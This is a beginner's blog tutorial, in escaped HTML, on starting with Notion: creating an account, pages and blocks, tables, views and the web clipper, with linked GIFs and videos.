At some point in time, we\u2019ve all struggled to maintain track of our sprint details, research, and design files in one place. As we\u2019re all used to our own tools, it\u2019s been tough to maintain consistency and transparency throughout the design teams, especially since the pandemic started.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p><strong>Notion here will give us the advantage to keep all of our data in one place.<\/strong><\/p><\/blockquote>\n\n\n\n<p id=\"37f6\">But getting started with Notion can be a challenge and might need some playing around with the tool! Most of the YouTube channels and tutorials start with databases which can be confusing.&nbsp;<strong>So first things first, let us understand the basics!<\/strong><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/960\/1*8QIplOftoFCcG3AuXWOqVA.gif\" alt=\"\"\/><figcaption>Source:&nbsp;<a href=\"https:\/\/giphy.com\/gifs\/cbc-schittscreek-schitts-creek-1ZlrrYTN7gAxdGE8nM\" rel=\"noreferrer noopener\" target=\"_blank\">Giphy<\/a><\/figcaption><\/figure><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"8a99\">1. Create an account!<\/h2>\n\n\n\n<p id=\"b89b\">To create an account, you can simply go to&nbsp;<a href=\"https:\/\/www.notion.so\/\" rel=\"noreferrer noopener\" target=\"_blank\">Notion\u2019s website<\/a>&nbsp;and fill in the basic details as follows. The Notion has a web application as well as a desktop application. you can choose whatever you are comfortable with!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*9e9uhchhxS6bX9hj8AzOuw.png\" alt=\"\"\/><figcaption>Creating a Notion account<\/figcaption><\/figure><\/div>\n\n\n\n<ul class=\"wp-block-list\"><li>Use&nbsp;<a href=\"http:\/\/notion.so\/\" rel=\"noreferrer noopener\" target=\"_blank\">Web Application<\/a><\/li><li><a href=\"https:\/\/www.notion.so\/mobile\" rel=\"noreferrer noopener\" target=\"_blank\">Download<\/a>&nbsp;the app (iOS and Android)<\/li><li><a href=\"https:\/\/www.notion.so\/desktop\" rel=\"noreferrer noopener\" target=\"_blank\">Download<\/a>&nbsp;the Desktop App (Mac and Windows)<\/li><li>Install the Notion&nbsp;<a href=\"https:\/\/chrome.google.com\/webstore\/detail\/notion-web-clipper\/knheggckgoiihginacbkhaalnibhilkk?hl=en\" rel=\"noreferrer noopener\" target=\"_blank\">Web Clipper<\/a><\/li><\/ul>\n\n\n\n<p id=\"cda1\">Now that you have created an account, Notion will suggest&nbsp;<strong><em>\u201cTemplates\u201d<\/em>&nbsp;<\/strong>that can help you get started. But in my opinion, Templates are great once you have an idea of the basic building blocks.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*yVXu_KyGA32tkOdtU-EekA.png\" alt=\"\"\/><figcaption>Starter Templates<\/figcaption><\/figure><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"ad70\">2. Understand what are Page and Building Blocks<\/h2>\n\n\n\n<p id=\"3230\">The main building blocks of Notion are pages. To create a page click on the&nbsp;<strong>\u201c<em>Add a page<\/em>\u201d<\/strong>&nbsp;button in the left navigation menu. A blank page will be created and you can see a menu with page types. You can click on any of them to turn your page into a table, board, etc. You can also import a template of your choice from Notion\u2019s template library. Now give your page a title and then tada! You can start adding content now.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*ClJZWCudRC0G-OSUlib1gg.gif\" alt=\"\"\/><figcaption>Creating a page<\/figcaption><\/figure><\/div>\n\n\n\n<p id=\"12f8\">Now, use a<strong>&nbsp;\u201c\/\u201d&nbsp;<\/strong>and a popup will appear to choose from a wide range of content types (text, to-do lists, Figma files, and even Spotify playlist!)<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*6uoMiWYnSjfDNEkOZO35pw.gif\" alt=\"\"\/><figcaption>Basic building blocks<\/figcaption><\/figure><\/div>\n\n\n\n<p id=\"3ede\">The page structure in Notion is hierarchical. Consider our desktop folders as an example. On our desktop, we can create folders within folders. Understand how to adjust blocks<\/h2>\n\n\n\n<p id=\"a40b\">Blocks in Notion can be moved around within your page and adjusted however you like! Click on the block you want to adjust and a 6 dot menu will appear holding which you can drag the block around the page and adjust accordingly.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*6OYWCzxvD5hxRI9iuIj5ew.gif\" alt=\"\"\/><figcaption>Adjusting blocks in Notion<\/figcaption><\/figure><\/div>\n\n\n\n<p id=\"ab84\"><strong>To know more about adjusting a block watch this&nbsp;<\/strong><a href=\"https:\/\/youtu.be\/11AJCbZ5Xew?t=764\" rel=\"noreferrer noopener\" target=\"_blank\"><strong>Youtube video.<\/strong><\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"3069\">4. Understand Tables<\/h2>\n\n\n\n<p id=\"e7ef\">Tables in Notion are pretty amazing and can do everything like an excel sheet (and in my opinion much more than an excel sheet!). Notion allows you to have columns with different data types such as links, emails, numbers, checkboxes, tags(my fav **<em>cries**<\/em>), images, formulas, files, and much more.<\/p>\n\n\n\n<p id=\"2667\">To add a simple table to your page, type&nbsp;<strong>\u201c<em>\/table database inline<\/em>\u201d<\/strong>&nbsp;to create a table within the same page.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*TaNTRhlvXPgcunwxLG58vQ.gif\" alt=\"\"\/><figcaption>Adding a table<\/figcaption><\/figure><\/div>\n\n\n\n<p id=\"4d22\">Now here are the three fundamental things to understand about Notion\u2019s table columns.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li><strong>Column name &#8211;<\/strong>&nbsp;This is nothing but a field name as per traditional database conventions.<\/li><li><strong>Property &#8211;<\/strong>&nbsp;The data type of a column. The data type of the first column in a Notion table will always be&nbsp;<strong><em>\u201cTitle\u201d<\/em><\/strong>&nbsp;and the data type cannot be changed or deleted.<\/li><li>Each row in a notion table is created as a page. So when you click on the first value of a row, it can be opened into another page<\/li><\/ol>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*o9_UkkaoOucJDdRqV_JUaQ.gif\" alt=\"\"\/><figcaption>Changing the property (DataType) of a column<\/figcaption><\/figure><\/div>\n\n\n\n<p id=\"9ab0\"><strong>To know more about Notion\u2019s tables watch this&nbsp;<\/strong><a href=\"https:\/\/www.youtube.com\/watch?v=7js81jWq8mk&amp;t=151s\" rel=\"noreferrer noopener\" target=\"_blank\"><strong>Youtube video.<\/strong><\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"e65f\">5. Understand Views<\/h2>\n\n\n\n<p id=\"7d96\">Okay now that we know the basics of notion, we can start with views! YAY\u2728<\/p>\n\n\n\n<p id=\"55e5\">Consider this example where you want to view your table of scheduled user interviews in a form of a calendar. You can create a calendar view with the following steps :<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li><em>Click the&nbsp;<\/em><strong><em>\u201cAdd a view\u201d<\/em><\/strong>&nbsp;button beside your table name<\/li><li>Name your view<\/li><li>Select calendar from the dropdown and hit create.<\/li><\/ol>\n\n\n\n<p id=\"6945\">Tadaaa\u2728 your calendar view for scheduled user interviews is now created.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1400\/1*iqZYpNOldQfbE9f4tup06A.gif\" alt=\"\"\/><figcaption>Creating a calendar view<\/figcaption><\/figure><\/div>\n\n\n\n<p id=\"28e8\">There total of 6 types of views in Notion.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Table (<a href=\"https:\/\/www.youtube.com\/watch?v=7js81jWq8mk\" rel=\"noreferrer noopener\" target=\"_blank\">know more<\/a>)<\/li><li>Board (<a href=\"https:\/\/www.youtube.com\/watch?v=g7oH1VqXhUY\" rel=\"noreferrer noopener\" target=\"_blank\">know more)<\/a><\/li><li>Timeline (<a href=\"https:\/\/www.youtube.com\/watch?v=0kKyHX2AV2w\" rel=\"noreferrer noopener\" target=\"_blank\">know more<\/a>)<\/li><li>Calendar (<a href=\"https:\/\/www.youtube.com\/watch?v=Q-Ci9sEB6_Y\" rel=\"noreferrer noopener\" target=\"_blank\">know more<\/a>)<\/li><li>List (<a href=\"https:\/\/www.youtube.com\/watch?v=TQP6k9hzOi0\" rel=\"noreferrer noopener\" target=\"_blank\">know more<\/a>)<\/li><li>Gallery (<a href=\"https:\/\/www.youtube.com\/watch?v=grOtT-9AwjI\" rel=\"noreferrer noopener\" target=\"_blank\">know more<\/a>)<\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"c0b2\">6. Understand how to use Notion\u2019s web clipper<\/h2>\n\n\n\n<p id=\"6fd5\">Notion web clipper allows you to save any page on the web to your Notion workspace, and you can do this with just one click! Simply tap the Notion button in the top right of your browser if you see something you want to save. Choose exactly where you want to save your web pages and they will be automatically organized in your notion workspace.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/miro.medium.com\/max\/1200\/1*q9h7kvOvTynDREZzg1GYKQ.gif\" alt=\"\"\/><figcaption>Notion\u2019s Web Clipper<\/figcaption><\/figure><\/div>\n\n\n\n<p id=\"7e86\">Okay, Yay! Now that you have learned the basics, you can start experimenting around! It might be a little confusing at the start but I hope this article helps you. I have been using Notion for a year now and there is no going back! Personally, I use Notion to regularly track my finances, and maintain my weekly and daily to-do lists. Also, my portfolio is on Notion as well (**wink**) which I call\u00a0<strong><em>\u201cNotionfolio\u201d,<\/em><\/strong><em>\u00a0<\/em>hahaha \u2728<\/p>\n\n\n\n<p id=\"1609\">Below are some Notion templates that I use on a daily basis.
